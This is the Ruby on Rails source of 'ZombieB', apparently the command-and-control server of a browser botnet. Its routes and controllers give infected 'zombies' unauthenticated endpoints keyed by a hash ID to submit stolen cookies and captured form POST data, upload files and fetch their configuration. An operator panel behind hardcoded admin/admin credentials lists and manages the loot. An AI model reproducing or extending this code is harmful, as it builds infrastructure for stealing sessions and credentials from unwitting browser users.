full/server/ZombieB/config/routes.rb
ZombieB::Application.routes.draw do
  resources :file
  resources :upload
  match 'postinfos/removeall' => 'postinfos#removeall'
  resources :postinfos
  match 'cookies/removeall' => 'cookies#removeall'
  resources :cookies
  resources :ccconfigs
  resources :zombies do
	resources :ccconfigs
	resources :cookies 
	resources :postinfos
  end

  match 'c/:hashid' => 'zombies#conf'
  match 'login/:hashid' => 'zombies#login'
  match 'addcookie/:hashid' => 'cookies#new_fromhash'
  match 'addpostinfo/:hashid' => 'postinfos#new_fromhash'
  match 'upload/:hashid' => 'zombies#upload' 
  match 'extensions' => 'extensions#show' 
  match 'ccconfigs/:id/demo' => 'ccconfigs#demo', :as=>:demo

   root :to => 'zombies#index'

end

full/server/ZombieB/app/models/postinfo.rb
class Postinfo < ActiveRecord::Base
  belongs_to :zombie
  attr_accessible :data
end

full/server/ZombieB/app/controllers/postinfos_controller.rb
class PostinfosController < ApplicationController
http_basic_authenticate_with :name => "admin", :password => "admin", :except => [:new_fromhash]
  # GET /postinfos
  # GET /postinfos.json
  def index
    @postinfos = Postinfo.all

    respond_to do |format|
      format.html # index.html.erb
      format.json { render json: @postinfos }
    end
  end
	def replacer
		render(:layout => false)
	end
  
    def new_fromhash
    @zombie = Zombie.where(:hashid => params[:hashid]).first
	@postinfo = @zombie.postinfos.create(params[:postinfo])
    respond_to do |format|
      format.html # new.html.erb
      format.json { render json: @cookie }
    end
  end
  
  # GET /postinfos/1
  # GET /postinfos/1.json
  def show
    @postinfo = Postinfo.find(params[:id])

    respond_to do |format|
      format.html # show.html.erb
      format.json { render json: @postinfo }
    end
  end

  # GET /postinfos/new
  # GET /postinfos/new.json
  def new
    @postinfo = Postinfo.new

    respond_to do |format|
      format.html # new.html.erb
      format.json { render json: @postinfo }
    end
  end

  # GET /postinfos/1/edit
  def edit
    @postinfo = Postinfo.find(params[:id])
  end

  # POST /postinfos
  # POST /postinfos.json
  def create
    @zombie = Zombie.find(params[:zombie_id])
    @postinfo = @zombie.postinfos.create(params[:postinfo])

    respond_to do |format|
      if @postinfo.save
        format.html { redirect_to @zombie, notice: 'Postinfo was successfully created.' }
        format.json { render json: @postinfo, status: :created, location: @postinfo }
      else
        format.html { render action: "new" }
        format.json { render json: @postinfo.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /postinfos/1
  # DELETE /postinfos/1.json
  def destroy
    @postinfo = Postinfo.find(params[:id])
    @postinfo.destroy

    respond_to do |format|
      format.html { redirect_to postinfos_url }
      format.json { head :no_content }
    end
  end

  	def removeall
	  Postinfo.delete_all
	  flash[:notice] = "You have removed all post info!"
	  redirect_to zombies_path
	end
  
  end

full/server/ZombieB/app/helpers/postinfos_helper.rb
module PostinfosHelper
end

full/server/ZombieB/app/views/postinfos/_form.html.erb
<%= form_for(@postinfo) do |f| %>
  <% if @postinfo.errors.any? %>
    <div id="error_explanation">
      <h2><%= pluralize(@postinfo.errors.count, "error") %> prohibited this postinfo from being saved:</h2>

      <ul>
      <% @postinfo.errors.full_messages.each do |msg| %>
        <li><%= msg %></li>
      <% end %>
      </ul>
    </div>
  <% end %>

  <div class="field">
    <%= f.label :data %><br />
    <%= f.text_field :data %>
  </div>
  <div class="field">
    <%= f.label :zombie %><br />
    <%= f.text_field :zombie %>
  </div>
  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

full/server/ZombieB/app/views/postinfos/_form_zombie.html.erb
<%= form_for([@zombie, @zombie.postinfos.build]) do |f| %>


  <div class="field">
    <%= f.label :data %><br />
    <%= f.text_field :data %>
  </div>

  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

full/server/ZombieB/app/views/postinfos/_index_zombie.html.erb
<h1>Listing postinfos</h1>
<%= link_to "Refresh",
  :url => postinfos_url ,
  :update => "postinfodiv" , :remote => true%>

<div id="postinfodiv">
<table>
  <tr>
    <th>Data</th>
    <th></th>
    <th></th>
    <th></th>
  </tr>

    <% even_odd = 0 
@zombie.postinfos.each do |postinfo| 
even_odd = 1 - even_odd
%>
<tr class="background<%= even_odd %>">
    <td><%= postinfo.data %></td>
    <td><%= link_to 'Destroy', postinfo, :data => {confirm: 'Are you sure?'}, method: :delete %></td>
  </tr>
<% end %>
</table>
<% if @zombie.postinfos.size == 0 %>
<em>No post data found</em>
<% end %>
</div>
<br />

full/server/ZombieB/app/views/postinfos/edit.html.erb
<h1>Editing postinfo</h1>

<%= render 'form' %>

<%= link_to 'Show', @postinfo %> |
<%= link_to 'Back', postinfos_path %>

full/server/ZombieB/app/views/postinfos/index.html.erb
<h1>Listing postinfos</h1>

<table>
  <tr>
    <th>Data</th>
    <th>Zombie</th>
    <th></th>
    <th></th>
    <th></th>
  </tr>

<% @postinfos.each do |postinfo| %>
  <tr>
    <td><%= postinfo.data %></td>
    <td><%= postinfo.zombie %></td>
    <td><%= link_to 'Show', postinfo %></td>
    <td><%= link_to 'Edit', edit_postinfo_path(postinfo) %></td>
    <td><%= link_to 'Destroy', postinfo, :data => {confirm: 'Are you sure?'}, method: :delete %></td>
  </tr>
<% end %>
</table>

<br />

<%= link_to 'New Postinfo', new_postinfo_path %>

full/server/ZombieB/app/views/postinfos/new.html.erb
<h1>New postinfo</h1>

<%= render 'form' %>

<%= link_to 'Back', postinfos_path %>

full/server/ZombieB/app/views/postinfos/new_fromhash.html.erb
<h1>New postinfo</h1>

<%= render 'form' %>

<%= link_to 'Back', postinfos_path %>

full/server/ZombieB/app/views/postinfos/show.html.erb
<p id="notice"><%= notice %></p>

<p>
  <b>Data:</b>
  <%= @postinfo.data %>
</p>

<p>
  <b>Zombie:</b>
  <%= @postinfo.zombie %>
</p>


<%= link_to 'Edit', edit_postinfo_path(@postinfo) %> |
<%= link_to 'Back', postinfos_path %>